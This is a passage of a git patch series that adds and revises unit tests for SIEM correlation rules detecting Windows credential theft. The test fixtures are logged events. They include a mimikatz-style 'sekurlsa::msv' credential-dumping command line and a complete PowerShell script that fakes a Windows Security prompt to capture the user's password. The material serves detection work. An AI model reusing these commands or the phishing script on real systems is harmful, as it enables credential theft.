sekurlsa::msv\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\tools\\\\bibikatz_trunk\\\\x64\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"TESTLAB\\\\vasya\",\"Name\":\"User\"},{\"text\":\"{63310a87-d18f-63d3-8410-0d0000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0xd1084\",\"Name\":\"LogonId\"},{\"text\":\"2\",\"Name\":\"TerminalSessionId\"},{\"text\":\"High\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=6EDAEB2D29A6B377A0A02C416E6B00D0,SHA256=609B0B3824A99FD78A5E18EDD3461976EB3D7304A2D377210E0F845CDF964D78,IMPHASH=9528A0E91E28FBB88AD433FEABCA2456\",\"Name\":\"Hashes\"},{\"text\":\"{63310a87-fbe9-6461-8b1e-000000001b00}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"6728\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"ParentImage\"},{\"text\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" \",\"Name\":\"ParentCommandLine\"},{\"text\":\"TESTLAB\\\\vasya\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "63310a87-d18f-63d3-8410-0d0000000000", "event_src.category": "Other", "event_src.fqdn": "win10x64-154.testlab.esc", "event_src.host": "win10x64-154.testlab.esc", "event_src.hostname": "win10x64-154", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:vasya@testlab", "object.account.name": "vasya", "object.account.privileges": "High", "object.account.session_id": "856196", "object.process.cmdline": "bibikatz.exe privilege::debug sekurlsa::msv", "object.process.cwd": "C:\\tools\\bibikatz_trunk\\x64\\", "object.process.fullpath": "c:\\tools\\bibikatz_trunk\\x64\\bibikatz.exe", "object.process.guid": "63310a87-0104-6462-5d1f-000000001b00", "object.process.hash.imphash": "9528A0E91E28FBB88AD433FEABCA2456", "object.process.hash.md5": "6EDAEB2D29A6B377A0A02C416E6B00D0", "object.process.hash.sha256": "609B0B3824A99FD78A5E18EDD3461976EB3D7304A2D377210E0F845CDF964D78", "object.process.id": "3700", "object.process.meta": "Description:custom file description | Product:bibikatz | Company:Custom company", "object.process.name": "bibikatz.exe", "object.process.original_name": "bibikatz.exe", "object.process.parent.cmdline": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "63310a87-fbe9-6461-8b1e-000000001b00", "object.process.parent.id": "6728", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\tools\\bibikatz_trunk\\x64\\", "object.process.version": "2.2.0.0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-15T09:57:43.023Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:vasya@testlab", "subject.account.name": "vasya", "subject.account.privileges": "High", "subject.account.session_id": "856196", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-15T09:53:08.126Z", "type": "raw", "uuid": "b7b515f4-390a-4f87-9865-aafc6b6094ea"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "Mimikatz", "correlation_type": "incident", "datafield6": "63310a87-d18f-63d3-8410-0d0000000000", "event_src.fqdn": "win10x64-154.testlab.esc", "event_src.host": "win10x64-154.testlab.esc", "event_src.hostname": "win10x64-154", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Mimikatz|win10x64-154.testlab.esc|synthetic:vasya@testlab", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:vasya@testlab", "object.account.name": "vasya", "object.account.session_id": "856196", "object.process.cmdline": "bibikatz.exe privilege::debug sekurlsa::msv", "object.process.cwd": "C:\\tools\\bibikatz_trunk\\x64\\", "object.process.fullpath": "c:\\tools\\bibikatz_trunk\\x64\\bibikatz.exe", "object.process.guid": "63310a87-0104-6462-5d1f-000000001b00", "object.process.hash.md5": "6EDAEB2D29A6B377A0A02C416E6B00D0", "object.process.hash.sha256": "609B0B3824A99FD78A5E18EDD3461976EB3D7304A2D377210E0F845CDF964D78", "object.process.id": "3700", "object.process.meta": "Description:custom file description | Product:bibikatz | Company:Custom company", "object.process.name": "bibikatz.exe", "object.process.original_name": "bibikatz.exe", "object.process.parent.cmdline": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "63310a87-fbe9-6461-8b1e-000000001b00", "object.process.parent.id": "6728", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\tools\\bibikatz_trunk\\x64\\", "object.process.version": "2.2.0.0", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:vasya@testlab", "subject.account.name": "vasya", "subject.account.privileges": "High", "subject.account.session_id": "856196"} From d1843288404a4558e121ce8e1a02b30be8c626eb Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 19:18:26 +0300 Subject: [PATCH 12/57] =?UTF-8?q?=D0=A3=D0=B4=D0=B0=D0=BB=D0=B8=D0=BB=20?= =?UTF-8?q?=D0=BF=D0=BE=D0=B2=D1=82=D0=BE=D1=80=D1=8F=D1=8E=D1=89=D0=B8?= =?UTF-8?q?=D0=B5=D1=81=D1=8F=20=D1=82=D0=B5=D1=81=D1=82=D1=8B,=20=D1=80?= =?UTF-8?q?=D0=B0=D1=81=D1=88=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE?= =?UTF-8?q?=D1=82=D0=BE=D1=80=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6?= =?UTF-8?q?=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Mimikatz=5FMemssp=5FDef?= =?UTF-8?q?ault=5FLog=5FDetected)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Для второго модульного теста изменил "условие прохождение теста" на (expect not { "correlation_name": "Mimikatz_Memssp_Default_Log_Detected" } ) --- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc | 5 +++-- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc | 4 ++-- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc | 3 --- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc | 3 --- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc | 3 --- 5 files changed, 5 insertions(+), 13 deletions(-) delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc index 14c2b3d9..bdc118e7 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc @@ -1,3 +1,4 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\system32\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-11T12:10:22.3987265Z\"},\"EventRecordID\":\"385052\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3044\",\"ThreadID\":\"3900\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"UtcTime\",\"text\":\"2020-09-11 12:10:22.357\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-672c-5f5b-0d00-00000000fc00}\"},{\"Name\":\"ProcessId\",\"text\":\"640\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\System32\\\\mimilsa.log\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-09-11 12:10:22.357\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\system32\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} -expect 1 {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "Mimikatz_Memssp_Default_Log_Detected", "correlation_type": "incident", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Mimikatz_Memssp_Default_Log_Detected|msedgewin10|640", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "file_object", "object.fullpath": "c:\\windows\\system32\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc index 8655b8f8..eac5d631 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc @@ -1,4 +1,4 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\syswow64\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\syswow64\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\syswow64\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\syswow64\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-11T12:10:22.3987265Z\"},\"EventRecordID\":\"385052\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3044\",\"ThreadID\":\"3900\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"UtcTime\",\"text\":\"2020-09-11 12:10:22.357\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-672c-5f5b-0d00-00000000fc00}\"},{\"Name\":\"ProcessId\",\"text\":\"640\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\System32\\\\another.log\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-09-11 12:10:22.357\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\system32\\another.log", "object.name": "another.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} +expect not {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc deleted file mode 100644 index 005a143f..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc +++ /dev/null @@ -1,3 +0,0 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\somefolder\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\somefolder\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\somefolder\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\somefolder\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} - -expect 1 {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc deleted file mode 100644 index ef0c2b3e..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc +++ /dev/null @@ -1,3 +0,0 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\somefolder\\another.log", "object.name": "another.log", "object.path": "c:\\somefolder\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\somefolder\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\somefolder\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} - -expect not {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc deleted file mode 100644 index 627568cb..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc +++ /dev/null @@ -1,3 +0,0 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\system32\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\process.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "process.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} - -expect not {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} From 6ab49939b6553073b65874b75df4ea205fdf85b2 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 19:27:16 +0300 Subject: [PATCH 13/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Phishing=5Fwindows=5Fcr?= =?UTF-8?q?edentials=5Fpowershell=5Fscriptblock)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Phishing_windows_credentials_powershell_scriptblock/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Phishing_windows_credentials_powershell_scriptblock/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Phishing_windows_credentials_powershell_scriptblock/tests/test_1.sc new file mode 100644 index 00000000..d49df6e6 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Phishing_windows_credentials_powershell_scriptblock/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-09-09T13:35:09.3152300Z\"},\"EventRecordID\":\"1123\",\"Correlation\":{\"ActivityID\":\"{b5abe6c2-675c-0001-a601-acb55c67d501}\"},\"Execution\":{\"ProcessID\":\"5500\",\"ThreadID\":\"356\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"}},\"EventData\":{\"Data\":[{\"Name\":\"MessageNumber\",\"text\":\"1\"},{\"Name\":\"MessageTotal\",\"text\":\"1\"},{\"Name\":\"ScriptBlockText\",\"text\":\"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\\\"Windows Security\\\", \\\"Please enter user credentials\\\", \\\"$env:userdomain\\\\$env:username\\\",\\\"\\\") $username = \\\"$env:username\\\" $domain = \\\"$env:userdomain\\\" $full = \\\"$domain\\\" + \\\"\\\\\\\" + \\\"$username\\\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\\\"$full\\\",\\\"$password\\\") -ne $True){ $cred = $Host.ui.PromptForCredential(\\\"Windows Security\\\", \\\"Invalid Credentials, Please try again\\\", \\\"$env:userdomain\\\\$env:username\\\",\\\"\\\") $username = \\\"$env:username\\\" $domain = \\\"$env:userdomain\\\" $full = \\\"$domain\\\" + \\\"\\\\\\\" + \\\"$username\\\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\\\"$full\\\", \\\"$password\\\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt\"},{\"Name\":\"ScriptBlockId\",\"text\":\"c7ca7056-b317-4fff-b796-05d8ef896dcd\"},{\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.id": "c7ca7056-b317-4fff-b796-05d8ef896dcd", "object.process.cmdline": "function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", 